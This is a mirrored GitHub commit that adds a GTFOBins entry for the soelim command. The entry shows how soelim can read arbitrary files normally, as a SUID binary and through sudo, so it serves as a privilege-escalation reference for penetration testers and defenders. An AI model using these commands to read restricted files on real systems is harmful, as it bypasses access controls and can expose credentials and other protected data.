mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Create soelim.md
This commit is contained in:
parent
4cb792888c
commit
0e78ab8010
16
_gtfobins/soelim.md
Normal file
16
_gtfobins/soelim.md
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
---
|
||||||
|
description: The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.
|
||||||
|
functions:
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
soelim "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./soelim "$LFILE"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo soelim "$LFILE"
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user